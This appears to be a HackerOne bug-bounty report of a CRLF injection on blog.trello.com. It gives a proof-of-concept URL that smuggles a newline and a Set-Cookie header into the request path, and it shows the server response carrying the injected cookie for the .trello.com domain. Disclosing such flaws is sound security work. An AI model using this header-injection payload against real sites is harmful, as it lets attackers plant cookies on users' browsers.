Trello: [blog.trello.com] CRLF Injection

2015-01-28T10:49:12
ID H1:45514
Type hackerone
Reporter bobrov
Modified 2016-09-25T16:16:02

Description

PoC: https://blog.trello.com/%0aSet-Cookie:CRLF=INJECTION;domain=.trello.com

HTTP Response: > HTTP/1.1 301 Moved Permanently > Server: nginx > Date: Wed, 28 Jan 2015 10:47:51 GMT > Content-Type: text/html > Content-Length: 178 > Connection: close > Location: http://blog.trello.com/ > Set-Cookie:CRLF=INJECTION;domain=.trello.com

Result: Creating a cookie-param "CRLF=INJECTION" on *.trello.com